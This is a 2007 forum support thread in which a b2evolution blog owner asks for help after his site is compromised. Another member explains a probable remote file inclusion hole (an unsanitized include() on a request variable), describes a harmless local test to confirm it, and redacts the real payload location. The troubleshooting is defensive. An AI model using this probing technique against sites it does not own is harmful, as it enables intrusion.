1 stevet Jun 19, 2007 07:34
3 edb Jun 19, 2007 21:04
stevet I can't help with this issue, but those who can will surely want to know some stuff. What version are you running? How much did you hack up your installation - if at all. Are you using a 'standard' skin or did you customize a skin more than the "include html" you showed above.
There are very few people who can help you with this, and even though I am not one of them I feel very confident saying that without more info they will be unable to do anything. I'm probably wrong, but right now I feel confident this is a truthful statement. If it is an exploit of b2evolution I have no doubt the developers - and all other users - will want to know about it. OTOH if it is a hole you opened up then everyone will want to know what the hole was so that it can be avoided in the future.
4 stevet Jun 19, 2007 21:17
EdB (and anyone else) The version is 1.9.3
I've not made any substantial hacks just a couple of minor ones in the media uploader. The skin is my own customized layout but just a cosmetic shuffling of the Custom (as far as I recall) skin. Most of the changes are in CSS.
5 balupton Jun 19, 2007 22:00
Apparently there's an unsanitized include() statement performed on the $...
variable of your script, which allows attackers to execute arbitrary PHP
code with your user permissions.
That could be anywhere, the reference to index.php just means that was the script that was accessed to perform the exploit.
The stuff that is of interest is /index.php?var=XXXX
From that you know:
- The variable that has caused the problem is that $var variable (I would scan all your files in dreamweaver or something to see if any files use a variable called $var).
- The evil remote code is located at XXXX.
So what has happened is that somewhere inside the executed code there was a include $var; or something similar thus running the script located at XXXX which did the evil work.
If you have a backup of your blog, you could test this theory by making a .txt file containing <?php die('test'); ?> then go to index.php?var=txtfilelocation.
Stevet, I've also removed the variable name and script location from your post to stop any curious readers from performing the exploit if there is indeed a problem. (The smart people that EdB was talking about still have access to them).
Update: I've tested this theory on my local install and nothing bad happened, so I'm gonna go with their some just some dodgy code on your server that had a include $var somewhere... So if you can find that, it's smooth sailing.
I would also advise you go and change all your passwords...
6 stevet Jun 19, 2007 22:37
you say I should search for $var yeah??
you mean on the server??
do I need to search all the files on the server or just the B2 installation
7 balupton Jun 19, 2007 22:51
If you still have access to the server then yeah, if you don't just do your local copy, could be worth doing both if you don't find it in one. So search all files inside the b2evolution folder for $var. Providing that your b2evo install only includes files from it's folder. Could be worth doing the whole site if need be, but just start off with small first and expand if needed.
If you get too many results to bother with by searching with "$var" then just try things like: "$var " and "$var." and "$var)" and "$var;" and "$var+" and "$var-" and $var," and "$var/" and "$var*" (i think thats all) so that way it doesn't pick up the "$var" in things like "$variable".
Note: by $var I do mean what $var was originally, in case that wasn't clear.
8 stevet Jun 19, 2007 22:56
Note: by $var I do mean what $var was originally, in case that wasn't clear.
I think I gotcha but I just sent you a PM anyhow
9 stevet Jun 19, 2007 23:03
nope I'm lost - can you PM me what I should be searching for
10 balupton Jun 19, 2007 23:04
Will do.
11 stevet Jun 19, 2007 23:53
I have run a search for the code you pointed out in a loal copy of all the B2 files and I have found nothing
This just got worse. Our host has locked down our server claiming they are getting large numbers of complaints about spam coming from or site